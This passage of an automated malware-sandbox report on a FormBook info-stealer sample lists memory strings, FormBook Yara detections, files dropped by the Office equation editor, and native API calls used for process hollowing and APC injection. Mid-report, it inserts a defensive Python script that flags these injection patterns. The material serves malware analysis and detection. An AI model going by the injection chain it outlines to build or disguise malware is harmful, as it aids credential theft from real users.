Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2192785429.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Code function: 6_2_004181C0 NtCreateFile,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00418270 NtReadFile,
Source: C:\Users\Public\vbc.exe Code function: 6_2_004182F0 NtClose,
Source: C:\Users\Public\vbc.exe Code function: 6_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe Code function: 6_2_004181BF NtCreateFile,
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041826B NtReadFile,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00418212 NtReadFile,
Source: C:\Users\Public\vbc.exe Code function: 6_2_004182EA NtClose,
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041831A NtReadFile,
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041839A NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041841A NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C600C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C60048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C60078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C607AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C610D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C60060 NtQuerySection,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C601D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C61148 NtOpenThread,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C6010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E0048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E0060 NtQuerySection,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E0078 NtResumeThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E10D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E1148 NtOpenThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E01D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DF8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DF938 NtWriteFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E1D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B81C0 NtCreateFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B8270 NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B82F0 NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B83A0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B81BF NtCreateFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B8212 NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B826B NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B82EA NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B831A NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B839A NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B841A NtAllocateVirtualMemory,
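The Yara hits listed under E-Banking Fraud and System Summary and the native-function stubs listed for vbc.exe and rundll32.exe are the two parts of this report a responder mines by hand: which memory regions the FormBook rules matched in, and which Nt* combinations per process line up with the hollowing, thread-injection and APC verdicts in the signature list. The Python below is an added example, not Joe Sandbox output or tooling, that parses a few constructed lines in the same shape (with a space restored between the source and the message) and derives both. It assumes that the fifth dotted field of a dump name is the Windows page-protection constant of the region (0x40 = PAGE_EXECUTE_READWRITE), which is a reading of the naming scheme rather than something the report states, and the API sets in INJECTION_PRIMITIVES are minimal sets chosen for this example, not the sandbox's own signature logic. It deliberately ignores the "String found in binary or memory" lines: the explorer.exe URLs above read as browser search-provider and favicon references in explorer.exe's own memory, not as indicators the sample introduced.

```python
"""Parse report lines of the shapes seen above into injection indicators.

Added example (not Joe Sandbox code): handles "Yara match File source: <dump>"
and "Code function: <pid>_<run>_<addr> <api>,..." lines and derives
  1. per process, which native-API combinations form a known injection primitive
  2. which Yara-matched dumps were executable+writable (unpacked code, not a file image)
"""
import re
from collections import defaultdict

# Constructed sample in the shape of the report lines above (spacing normalised).
SAMPLE_REPORT = r"""
Source: Yara match File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C5FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C60078 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024DFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024E0078 NtResumeThread,
"""

# Dump name fields, read here as pid.run.uid.base.protection.type (assumption about the naming scheme).
DUMP_RE = re.compile(
    r"File source: (?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp"
)
CODE_RE = re.compile(
    r"Source: (?P<image>.+?) Code function: (?P<pid>\d+)_\d+_[0-9A-Fa-f]+ (?P<calls>[\w,]+)"
)

# Windows memory-protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Minimal API sets chosen for this example: (all required, at least one of).
# Presence of the stubs is an indicator to corroborate the runtime verdicts, not proof.
INJECTION_PRIMITIVES = {
    "process hollowing": ({"NtUnmapViewOfSection", "NtResumeThread"},
                          {"NtMapViewOfSection", "NtWriteVirtualMemory"}),
    "APC injection": ({"NtQueueApcThread"},
                      {"NtMapViewOfSection", "NtWriteVirtualMemory"}),
    "thread context hijacking": ({"NtSetContextThread", "NtResumeThread"},
                                 {"NtGetContextThread", "NtSuspendThread"}),
}


def parse_report(text):
    """Return (dumps, calls): Yara-hit dump regions and per-process native-API sets."""
    dumps = []
    calls = defaultdict(lambda: {"image": None, "apis": set()})
    for line in text.splitlines():
        m = DUMP_RE.search(line)
        if m:
            prot = int(m["prot"], 16)
            dumps.append({"pid": int(m["pid"], 16), "base": int(m["base"], 16),
                          "protection": PAGE_PROTECTION.get(prot, f"{prot:#x}")})
            continue
        m = CODE_RE.search(line)
        if m:
            entry = calls[int(m["pid"])]
            entry["image"] = m["image"]
            # LdrInitializeThunk is loader noise beside the real stub; keep only Nt* names.
            entry["apis"].update(a for a in m["calls"].split(",") if a.startswith("Nt"))
    return dumps, dict(calls)


def injection_indicators(calls):
    """Map pid -> names of injection primitives whose API set is fully present."""
    return {pid: [name for name, (required, any_of) in INJECTION_PRIMITIVES.items()
                  if required <= entry["apis"] and entry["apis"] & any_of]
            for pid, entry in sorted(calls.items())}


def executable_yara_regions(dumps):
    """(pid, base) of Yara hits in executable+writable regions: unpacked code, not a file image."""
    return [(d["pid"], d["base"]) for d in dumps
            if d["protection"] in ("PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")]


if __name__ == "__main__":
    dumps, calls = parse_report(SAMPLE_REPORT)
    for pid, hits in injection_indicators(calls).items():
        print(f"pid {pid} ({calls[pid]['image']}): {', '.join(hits) or 'no full primitive'}")
    for pid, base in executable_yara_regions(dumps):
        print(f"pid {pid}: FormBook Yara hit inside RWX region at {base:#x}")
```

Run as a script it prints one line per process with the primitives whose stub set is complete, then the RWX regions the Yara rules fired in. Feed it the full native-function list from this report (after restoring the space the extraction dropped) and rundll32.exe comes out with all three primitives while vbc.exe shows only the hollowing set, which matches the injection chain in the signature list: the dropped vbc.exe hollows a process, and the injected payload in rundll32.exe does the later thread and APC work.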
Source: C:\Users\Public\vbc.exe Code function: 6_2_0027BF7F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B973
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041C1FB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408C5B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00408C60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041BC66
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041C75F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C6E0C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C73040
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C8905A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C9D005
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C6E2E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D11238
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C6F3CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C963DB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C77353
Source: C:\Users\Public\vbc.exe Code function: 6_2_00CBA37B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C72305
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C81489
Source: C:\Users\Public\vbc.exe Code function: 6_2_00CA5485
Source: C:\Users\Public\vbc.exe Code function: 6_2_00CAD47D
